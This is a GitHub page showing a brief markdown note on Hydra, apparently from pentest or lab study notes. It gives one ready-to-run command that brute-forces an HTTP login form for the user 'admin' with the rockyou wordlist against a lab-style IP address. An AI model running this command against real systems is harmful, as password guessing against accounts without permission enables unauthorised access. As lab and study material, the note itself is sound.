Skip to content

Latest commit

 

History

History
7 lines (5 loc) · 229 Bytes

hydra.md

File metadata and controls

7 lines (5 loc) · 229 Bytes

HYDRA - brute forcing tool

Brute forcing HTTP login

sudo hydra -l admin -P /usr/share/dict/rockyou.txt 10.129.1.15 http-post-form "/login.php:Username=admin&Submit=Login&Password=^PASS^:Incorrect information"